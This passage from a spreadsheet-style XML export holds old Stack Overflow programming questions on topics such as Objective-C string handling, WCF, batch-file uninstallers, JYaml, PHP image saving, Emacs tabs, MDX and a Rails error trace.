&lt;p&gt;But doesn't that leak memory with each assignment? Or does stringByReplacingOccurrencesOfString return autoreleased strings? How do we confirm that stringByReplacingOccurrencesOfString strings are autoreleased? Or should we wrap them with &lt;code&gt;[... autorelease]&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Even if they are autoreleased, it's preferable to avoid autorelease on the iPhone. (See &lt;a href="http://kosmaczewski.net/2009/01/28/10-iphone-memory-management-tips/" rel="nofollow"&gt;here&lt;/a&gt;). So then we would do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-(NSString*) unescape:(NSString*)string
{
    NSString* string2 = [string stringByReplacingOccurrencesOfString:@"&amp;amp;apos;" withString:@"'"];
    // don't release 'string' because we didn't allocate or retain it
    NSString* string3 = [string2 stringByReplacingOccurrencesOfString:@"&amp;amp;apos;" withString:@"'"];
    [string2 release];
    NSString* string4 = [string3 stringByReplacingOccurrencesOfString:@"&amp;amp;apos;" withString:@"'"];
    [string3 release];
    //...and so on
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that's pretty ugly code. What's the best way to write this code to do multiple substitutions? How would you do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Post a KeyEvent to the focused component</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to post a Button Press to a component?  I tried using the Robot class and it works, normally.  However, this class has some problems under some Linux platforms, so I wonder what is the best Java-only way to post an event to a component.&lt;/p&gt;
&lt;p&gt;In this particular case, I want to post backspace events to a JTextField when I press a button.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT: I've used the Robot class after all.  I fixed the problem that prevented this class from working correctly under Linux&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CSS Specificity and normalising your stylesheets after a tight deadline</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have just finished building a heavyweight long sales page, with a lot of elements and varying styles on the page.The CSS has ended up being over specific with its selectors, and there are numerous rounded boxes, background images etc. In short, the CSS is a bit of a mess. (only myself to blame!)&lt;/p&gt;
&lt;p&gt;Can anyone suggest a method of going through this stylesheet methodically, in an effort to combine my duplicate properties etc?  I doubt there are any tools to do this for me, but I'm wondering how others deal with this situation?&lt;/p&gt;
&lt;p&gt;Thanks.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF Memory Performance InstanceContextMode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been learning my way around WCF and I've got a question regarding the InstanceContextMode.&lt;/p&gt;
&lt;p&gt;Correct me if I'm wrong, but the WCF will instantiate your object, then call the service method on it per call by default.&lt;/p&gt;
&lt;p&gt;You can then set it to be PerSession or Single.&lt;/p&gt;
&lt;p&gt;It seems to me that it would make more sense to have something between session and call which could reuse your object.  I.e if my service were reentrant, then I could open connections to databases etc. in the constructor, then leave the object in memory to answer calls concurrently.&lt;/p&gt;
&lt;p&gt;But in the current WCF implementation, it seems that it will always recreate the object no matter what.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A problem with batch file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created a batch file, to uninstall my application. My problem is that as result, this uninstallation deleted some files but kept others. &lt;/p&gt;
&lt;p&gt;For example one, I created a folder in &lt;code&gt;C:\\Documents and settings\User-Name\myCompanyName\My Application name\&lt;/code&gt;
This folder contains all files for my application. Now when I uninstall, all these files are deleted. But I want to delete "myCompanyName" folder too from "C:\Documents and settings\User-Name"&lt;/p&gt;
&lt;p&gt;The other problem tied with the previous one is that I added a new folder to the start menu called &lt;code&gt;myComapny&lt;/code&gt; It holds 4 files:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;exe file&lt;/li&gt;
&lt;li&gt;config file &lt;/li&gt;
&lt;li&gt;help file, and &lt;/li&gt;
&lt;li&gt;uninstall file &lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;When I click on the uninstall file, it removes everything but &lt;strong&gt;still keeps&lt;/strong&gt; the folder in the start-menu containing the four files I just listed.&lt;/p&gt;
&lt;p&gt;How could I delete the unwanted folders through the &lt;strong&gt;batch file&lt;/strong&gt;?&lt;/p&gt;
&lt;p&gt;Here is my batch file code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   @echo off
   msiexec /x {DD75996F-C279-420A-9A19-48EF9EFE70C2} 
   RD /s "C:\Program Files\ASGATech"
   RD /s "C:\Documents and Settings\%userprofile%\start menu\programs\ASGATech"
   pause
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;NOTE: I tried to change the extension of the batch file from &lt;code&gt;bat&lt;/code&gt; to &lt;code&gt;cmd&lt;/code&gt;
I also tried to get the current login user %userprofile% to go to his/her start menu. If this way is wrong, please inform me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best practices to speed up site development with CMS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I speed up site development with a particular CMS if I need to build a lot of sites?
Should I prepare a few different solutions based on barebone CMS but with pre-built components and deploy them if similar site is being requested for production? 
Or should I use some solution generator like &lt;a href="http://Joomla-Builder.Com" rel="nofollow"&gt;Joomla-Builder&lt;/a&gt;?
Are there any tools for collaborative development of CMS-based sites?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JYaml: dump object without including class name</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an &lt;code&gt;ArrayList&lt;/code&gt; of objects being dumped to a YAML string and have been comparing the performance of JYaml and SnakeYaml in handling this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    ArrayList&amp;lt;HashMap&amp;gt; testList = new ArrayList&amp;lt;HashMap&amp;gt;();
    HashMap&amp;lt;String, String&amp;gt; testMap1 = new HashMap&amp;lt;String, String&amp;gt;();
    HashMap&amp;lt;String, String&amp;gt; testMap2 = new HashMap&amp;lt;String, String&amp;gt;();
    testMap1.put("1_1", "One");
    testMap1.put("1_2", "Two");
    testMap1.put("1_3", "Three");
    testMap2.put("2_1", "One");
    testMap2.put("2_2", "Two");
    testMap2.put("2_3", "Three");
    testList.add(testMap1);
    testList.add(testMap2);
    System.out.println(jYaml.dump(testList));
    System.out.println(snakeYaml.dump(testList));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;
The output from JYaml includes the serialised object's class name whereas the output from SnakeYaml does not:&lt;/p&gt;
&lt;p&gt;JYaml output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- !java.util.HashMap
  1_1: One
  1_3: Three
  1_2: Two
- !java.util.HashMap
  2_1: One
  2_2: Two
  2_3: Three
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;SnakeYaml output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- {'1_1': One, '1_3': Three, '1_2': Two}
- {'2_1': One, '2_2': Two, '2_3': Three}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;
I prefer the more 'clean' class name-less output of SnakeYaml as this would be more suitable for a language-neutral environment.&lt;/p&gt;
&lt;p&gt;I prefer the &lt;em&gt;speed&lt;/em&gt; of JYaml. Serialisation/deserialisation times increase &lt;em&gt;linearly&lt;/em&gt; with the amount of data being processed, as opposed to  &lt;em&gt;exponentially&lt;/em&gt; with SnakeYaml.&lt;/p&gt;
&lt;p&gt;I'd like to coerce JYaml into giving me class name-less output but am quite lost as to how this can be achieved.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finding patterns in source code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I wanted to learn about pattern recognition in general what would be a good place to start (recommend a book)?&lt;/p&gt;
&lt;p&gt;Also, does anybody have any experience/knowledge on how to go about applying these algorithms to find abstraction patterns in programs? (repeated code, chunks of code that do the same thing, but in slightly different ways, etc.)&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;Edit: I don't mind mathematically intensive books. In fact, that would be a good thing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Debug code security .net framework to use caspol.exe</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have an application that is distribute to a varity of customers. Sometime it is installed on a network share. Usually we can give that application access with caspol.exe and grant the LocalIntranet Zone FullTrust. Sometimes the customers admins do not manage to grant that application access due to some network settings. 
When we launch the exe it opens for a short time and appears in the Client Task Manager and disappears silently... now the question is there a tool which gives me some debugging or tracing details on that. Is there a tool to debug security issues like that... I assueme that this happens before any of my code is executed... and I do not see anything in the event trace neither on the client nor on the server...&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Retrieving Client Information from web service request</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If i have an applicataion requesting a service, is it possible for the web service to determine the name of the application or does this have to be sent within the request?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a built in URL class in .Net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm spending time breaking up URLs into &lt;code&gt;protocol://domain:port/path/filename&lt;/code&gt; but there must be a built in class, all I can find is &lt;code&gt;System.Security.Policy.Url&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make a Google Maps custom Overlay object behave like an InfoWindow?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My only problem with the InfoWindow is that I don't have a way to customize it's appearance (ie, the bubble, not it's contents). It seems that the only way to do that is to make my own Overlay and style that instead. But that gives me problems such as not being able to select text (dragging the mouse over this overlay just pans the map) or scroll (if the overlay has a div with overflowing text then scrolling causes the map to zoom in or out, clicking on the scroll bar will scroll but it will pan the map at the same time).&lt;/p&gt;
&lt;p&gt;I'm currently catching the mouseover and mouseout events to disable/enable dragging and zooming but I still can't highlight text and now scrolling the mouse wheel on an area of the overlay that doesn't have anything to scroll causes page elements outside of the map to move up the window.&lt;/p&gt;
&lt;p&gt;Has anyone else run into a situation like this? I haven't seen anything else that actually covers this and I'm trying not to tear out my hair trying to find a solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Threading in an Application Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Java program/thread that I want to deploy into an Application Server (GlassFish).  The thread should run as a "service" that starts when the Application Server starts and stops when the Application Server closes. &lt;/p&gt;
&lt;p&gt;How would I go about doing this?  It's not really a Session Bean or MDB. It's just a thread.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add "help"-text to a mex-function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a Matlab mex-file. However, mex-files seem to have a serious limitation: &lt;code&gt;help mexfilename&lt;/code&gt; won't cause a help text to appear.&lt;/p&gt;
&lt;p&gt;I could circumvent this by writing a m-file, that ultimately calls the mex-file, but includes help, but there has to be a better way.&lt;/p&gt;
&lt;p&gt;On the other side, that way I could do all the error-checking in the m-file, where it is far more convenient to do so...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enhanced Flex textarea / text viewer components?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any advanced textarea() component (AS3) for Flex available that could be used for both  viewing/exiting text nicely? &lt;/p&gt;
&lt;p&gt;It would be good to have a text select feature, too. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with php function to catch error on saving image</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a method to save an image, which is meant to deal gracefully with an error, setting $imageSrc to a particular image in the event of failure. My method works fine if the image is present, but no error conditions seems to be handled correctly.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$imageSrc = save_pic($PIC_URL, $pk);
function save_pic($pic_url, $pk) {
    $imageDir = './';
    if (!strlen($pic_url))
            return "removed.jpg";
    if (!is_dir($imageDir) || !is_writable($imageDir)) {
    	return "removed.jpg";
    }
    $image = file_get_contents($pic_url);
    if (empty($image)) {
    	return "removed.jpg";
    }
    $r = file_put_contents($imageDir.$pk.".jpg", $image);
    if ($r) {
            return "./$pk.jpg"; 
    } else {
            return "removed.jpg";
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the image does not exist, I get :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Warning: getimagesize(http://127.0.0.1/555.jpg) [function.getimagesize]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
in C:\Program Files\EasyPHP 2.0b1\www\get_auction.php on line 144
Array (
 [type] =&amp;gt; 2 [message] =&amp;gt; getimagesize(http://127.0.0.1/555.jpg)
 function.getimagesize]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
 [file] =&amp;gt; C:\Program Files\EasyPHP 2.0b1\www\get_auction.php
 [line] =&amp;gt; 144
) 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;returned.jpg is never returned in any event.&lt;/p&gt;
&lt;p&gt;edit: added imageResize code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function imageResize($imageURL, $maxWidth, $maxHeight)
{
global $outputWidth, $outputHeight, $maxWidth, $maxHeight;
$size = getimagesize($imageURL);
if ($size) {
    $imageWidth  = $size[0];
    $imageHeight = $size[1];
    $wRatio = $imageWidth / $maxWidth;
    $hRatio = $imageHeight / $maxHeight;
    $maxRatio = max($wRatio, $hRatio);
    if ($maxRatio &amp;gt; 1) {
        $outputWidth = $imageWidth / $maxRatio;
        $outputHeight = $imageHeight / $maxRatio;
    } else {
        $outputWidth = $imageWidth;
        $outputHeight = $imageHeight;
    }
} else {
    die(print_r(error_get_last()));
}
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Tabs in HTML mode in Emacs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I've started using emacs and I love it. However, I'm a tab person. Unless I'm working on a project that is already using spaces, I use tabs. I mostly do php and html work. I've  got tabs in php working well. But I can't figure out how to have html mode use tabs instead of two spaces.&lt;/p&gt;
&lt;p&gt;Here is what I have so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(setq c-default-style "python")
(setq-default c-basic-offset 4
    		  tab-width 4
    		  indent-tabs-mode t)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What can I set so that html mode will use tabs?&lt;/p&gt;
&lt;p&gt;Edit: Using Emacs 22.3.1&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Signing in Visual Studio 2005 - error using existing .pfx</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Built my project.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Created my .pfx using sn.exe -k (to create ShellTradingCCMPROD.pfx).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Copied the file to the application folder.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;In VS 2005, I go to the Signing tab, 'Select From File' and browse to the .pfx file. &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I hit 'Open' and I get the following error:&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The file 'C:\2009.02.1.1\ShellTrading.CCM.WinUI\ShellTradingCCMPROD.pfx' could not be imported: Cannot find the requested object.&lt;/p&gt;
&lt;p&gt;Other .pfx files work - any clues?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make a link in HTML turn a color when hovering and remove the underline using CSS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I make a link in HTML turn a color when hovering and remove the underline using CSS?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF: How to handle errors with a BackgroundWorker</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am a bit of a newbie when it comes to windows client programming. I have a background worker that has a DoWork event and a RunCompleted event wired up. If an exception gets thrown in DoWork, I want to make changes to my UI, however, I cant because it is in a different thread. I can communicate the error to RunCompleted, but that doesn't help me either.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CATIA-CAA CATKeyboardEvent</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know there are only a few CAA Programmers in the world but I try it anyway...&lt;/p&gt;
&lt;p&gt;I can't get keyboard events to work. I found this code which looks reasonable but the Notification doesn't fire.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AddAnalyseNotificationCB(CATFrmLayout::GetCurrentLayout()-&amp;gt;GetCurrentWindow()-&amp;gt;GetViewer(),
						CATKeyboardEvent::ClassName(),
						(CATCommandMethod)&amp;amp;PROTrvTreeView::OnKeyboardEvent, NULL);
void PROTrvTreeView::OnKeyboardEvent(CATCommand * ipCmd, CATNotification * ipEvt, CATCommandClientData iobjData) {
    cout&amp;lt;&amp;lt; "KeyboardEvent" &amp;lt;&amp;lt;endl;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anyone any idea?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dependency graph for Rails partials</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my current Ruby on Rails view we have many views and partials. So many in fact that it's not clear which view uses which partial (which itself may use other partials as well).&lt;/p&gt;
&lt;p&gt;The question is if there's a tool out there that generates a dependency graph of all views and partials (ideally generating a graph, but that's easy to do) or how you have solved this problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP Regex Question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Would it be possible to make a regex that reads {variable} like &lt;code&gt;&amp;lt;?php echo $variable ?&amp;gt;&lt;/code&gt; in PHP files?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;Remy&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Change Local path, team explorer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does any one know how to change the local path of the downloaded project in team explorer 2008. I downloaded a project to a wrong directory, now i deleted it and did get latest but i get a message 
"All files are up to date"&lt;/p&gt;
&lt;p&gt;Thanks
-Mithil&lt;/p&gt;
</t>
  </si>
  <si>
    <t>STOMP Protocol - Connect frame are login / passcode mandatory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been using the STOMP protocol in various guises. I have experienced this phenomenon in the PHP, Python and Objective-C libraries for STOMP. The STOMP specification on &lt;a href="http://stomp.codehaus.org/" rel="nofollow"&gt;the STOMP website&lt;/a&gt; is not specific on this point.&lt;/p&gt;
&lt;p&gt;Basically, the CONNECT function in all three libraries (although the Python one has now fixed this, it was acknowledged as a bug. The function still sends a login and passcode parameter, even if none are specified. As so..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CONNECT
login:
passcode:
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The specification is unclear, and I am wondering if anyone has any better idea about this. I am aware some people involved with STOMP and ActiveMQ browse these forums.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recompiling a simple Win32 C++ app for x64</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a small C++ program for Win32, which has the following WinMain:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;when trying to compile for x64, I get the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;error LNK2019: unresolved external symbol WinMain referenced in function __tmainCRTStartup
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What steps must be taken to recompile a simple win32 app for x64?&lt;/p&gt;
&lt;p&gt;Thank you&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the relationship between "late binding" and "inversion of control"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In &lt;a href="http://userpage.fu-berlin.de/~ram/pub/pub_jf47ht81Ht/doc_kay_oop_en" rel="nofollow"&gt;his definition&lt;/a&gt; of OOP, Alan Kay points out he supports "the extreme late-binding of all things". Does his interest in late-binding share the same motivation as people's interest in IoC?&lt;/p&gt;
&lt;p&gt;In particular, would it be correct to say that both are motivated by the concept "specify as little as possible, and leave implementation details to be filled in later"?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Make QA Drops of Only Selected Builds In CruiseControl.Net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;CC.Net is creating many builds for us each day.  Occasionally we do a bit of manual smoke testing and then a build becomes a QA drop (or release candidate if you prefer).  QA drops are just copied to a remove server.&lt;/p&gt;
&lt;p&gt;I'd like to automate the execution of the qa-drop-copy nant script, against an existing successful build.  How can I do that?  To phrase my question in a broader way, how are folks automating the publishing to QA of a single selection from the set of successful builds?&lt;/p&gt;
&lt;p&gt;I envision something like an extra button with the label 'QA Drop' that can trigger the script.  It might be next to the Force button (to publish that last build), or even available on each build report page (to publish any build).&lt;/p&gt;
&lt;p&gt;Thanks,
Josh&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Font Color not setting in Container on DOTNETNUKE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The header and body have the correct background color but the fonts look gray.  I am running on DOTNETNUKE version 4.9.0 and 4.9.1 and Windows 2003. &lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;test.htm&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;body class="border"&amp;gt;
    &amp;lt;div class="PhilosophyHeader" runat="server"&amp;gt;[ACTIONS][ICON] Â [TITLE]&amp;lt;/div&amp;gt;
    &amp;lt;div id="ContentPane" runat="server" class="PhilosophyBody"&amp;gt;&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;container.css&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.PhilosophyHeader
{
    color: #FF0000;
    font: normal normal bold 100%/normal serif;
    border: thin #CC9900;
    background-color: #CC9900;
}
.PhilosophyBody
{
    background-color: #800000;
    color: #CC9900;
}
.border
{
    border: thin #FFFF00 solid;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;edit: Removed &amp;lt; header &gt;, it did not effect problem.&lt;/p&gt;
&lt;p&gt;Answer: The problem was a combination of tags not matched and use of the same name in two containters.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Joining fact tables in an MDX query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building and Anaysis Services project using VS 2005.  The goal is to analyse advertising campaigns.&lt;/p&gt;
&lt;p&gt;I have a single cube with 2 fact tables&lt;/p&gt;
&lt;p&gt;factCampaign: which contains details of what people interviewed thought of an advertising campaign
factDemographics: which contains demographic information of the people interviewed&lt;/p&gt;
&lt;p&gt;These fact tables have a common dimension dimRespodent which refers to the actual person interviewed&lt;/p&gt;
&lt;p&gt;I have 2 other dimensions (Iâ€™ve left non relevant dimensions)&lt;/p&gt;
&lt;p&gt;dimQuestion: which contains the list of questions asked
dimAnswer: which contains the list of possible answers to each question&lt;/p&gt;
&lt;p&gt;dimQuestion and dimAnswer are linked to factDemogrpahics but not factCampaign&lt;/p&gt;
&lt;p&gt;I want to be able to run queries to return results of what people thought about campaign (from factCampaign) but using demographic criteria (using dimQuestion and dimAnswer)&lt;/p&gt;
&lt;p&gt;For example the how many Males, aged 18-25 recalled a particular campaign&lt;/p&gt;
&lt;p&gt;I am new to OLAP and Analysis Services (2005) so please excuse me if what I am asking is too basic.&lt;/p&gt;
&lt;p&gt;I have tried the following options&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Linking the to factTables in the datasource view using the common RespondentKey.  Queries run and return results but the same result is returned regardless of the demographic criteria chosen, i.e. it is being ignored.&lt;/li&gt;
&lt;li&gt;Creating a dimension from factDemographics.  I have tried to connect dimAnswer to factCampaign in Dimension Usage tabe of the Cube Structure but with out success.  Either the project just stalls when I try to deploy it or I get the following error (note the attribute hierarchy enabled is set to true)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Errors in the metadata manager. The 'Answer Key' intermediate granularity attribute of the 'Fact Demographics' measure group dimension does not have an attribute hierarchy enabled.&lt;/p&gt;
&lt;p&gt;I would appreciate any help that anyone can offer.  Let me know if you require more info and again apologies if this is a basic question&lt;/p&gt;
</t>
  </si>
  <si>
    <t>allow .NET 2.0 runtime to run executables from network with full trust</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Guys, this can't be for real&lt;/p&gt;
&lt;p&gt;I'm trying to make a .NET 2.0 executable run from a network drive and it turns out that since Microsoft .net 2.0 has no mscorcfg.msc installed on server 2003, in order to get one I have to install the full SDK. I simply want to run the dang thing without downloading 350Mb piece of crap!&lt;/p&gt;
&lt;p&gt;Sorry for rant... Anyone can think of an easy solution?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT1&lt;/strong&gt;: There seems to be a misunderstanding as to what is it that I want to achieve. This is for my test environment. I have many virtual machines and all I want is to just disable the dang security altogether. The task seems to be so trivial, yet it seems so far I have to deploy SDK, or 3.5 SP1, or some other multi-terabyte package to every machine in order to achieve it&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ninject : Resolving an object by type _and_ registration name/identifier</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a way to do something like this with Ninject :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Sample from the Unity application block
IMyService result = myContainer.Resolve&amp;lt;IMyService&amp;gt;("Data");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;( from &lt;a href="http://msdn.microsoft.com/en-us/library/cc440957.aspx"&gt;http://msdn.microsoft.com/en-us/library/cc440957.aspx&lt;/a&gt; )&lt;/p&gt;
&lt;p&gt;Is it possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does 'self' refer to in a @classmethod?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I thought I was starting to get a grip on "the Python way" of programming. Methods of a class accept self as the first parameter to refer to the instance of the class whose context the method is being called in. The @classmethod decorator refers to a method whose functionality is associated with the class, but which doesn't reference a specific instance.&lt;/p&gt;
&lt;p&gt;So, what does the first parameter of a @classmethod (canonically 'self') refer to if the method is meant to be called without an instance reference?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Viewing Rails model page works on first view but not subsequent views</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is using Rails 2.2.2&lt;/p&gt;
&lt;p&gt;I have a model that uses the acts_as_flaggable plugin, and on the page I use to display an instance of the model, I list any flags that the model has.&lt;/p&gt;
&lt;p&gt;When I start my Rails dev server(mongrel) using the standard script/server command, load the page holding the following code, it loads fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% @object.flags.each do |flag| %&amp;gt;
&amp;lt;tr&amp;gt;
&amp;lt;td&amp;gt;&amp;lt;%= time_ago_in_words(flag.created_at) %&amp;gt; ago&amp;lt;/td&amp;gt;
&amp;lt;td&amp;gt;&amp;lt;%= flag.flag %&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td&amp;gt;&amp;lt;%= link_to flag.user.login, user_path(flag.user) %&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;/tr&amp;gt;
&amp;lt;% end %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I reload the page(and on any subsequent views), I get the following NoMethodError error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;You have a nil object when you didn't expect it!
You might have expected an instance of Array.
The error occurred while evaluating nil.include?
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I restart the dev server, the page loads fine again one time then subsequent views yield the same strangeness.&lt;/p&gt;
&lt;p&gt;If I remove the line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;td&amp;gt;&amp;lt;%= link_to flag.user.login, user_path(flag.user) %&amp;gt;&amp;lt;/td&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The page loads fine and will reload fine from then on.&lt;/p&gt;
&lt;p&gt;It seems as if the flaggable plugin is having trouble with the user model for some reason, but then why does it work on the first page load? I also can't seem to repeat the problem using script/console.&lt;/p&gt;
&lt;p&gt;--EDIT--&lt;/p&gt;
&lt;p&gt;Adding in the stack trace per request. Under normal circumstances I usually can handle this particular error, but the part that is confusing me is why it works the first time.&lt;/p&gt;
&lt;p&gt;Here is the error page/trace as it appears to me, I hope this proves to be helpful:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NoMethodError in Admin#list_flagged
Showing app/views/admin/list_flagged.html.erb where line #65 raised:
You have a nil object when you didn't expect it!
You might have expected an instance of Array.
The error occurred while evaluating nil.include?
Extracted source (around line #65):
62:                   &amp;lt;tr&amp;gt;
63:                     &amp;lt;td&amp;gt;&amp;lt;%= time_ago_in_words(flag.created_at) %&amp;gt; ago&amp;lt;/td&amp;gt;
64:                     &amp;lt;td&amp;gt;&amp;lt;%= flag.flag %&amp;gt;&amp;lt;/td&amp;gt;
65:                     &amp;lt;td&amp;gt;&amp;lt;%= link_to flag.user.login, user_path(flag.user) %&amp;gt;&amp;lt;/td&amp;gt;
66:                   &amp;lt;/tr&amp;gt;
67:                 &amp;lt;% end %&amp;gt;
RAILS_ROOT: /dev/trunk
Application Trace | Framework Trace | Full Trace
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:142:in `create_time_zone_conversion_attribute?'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:75:in `define_attribute_methods'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:71:in `each'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:71:in `define_attribute_methods'
/usr/lib/ruby/gems/1.8/gems/activerecord-2.2.2/lib/active_record/attribute_methods.rb:350:in `respond_to?'
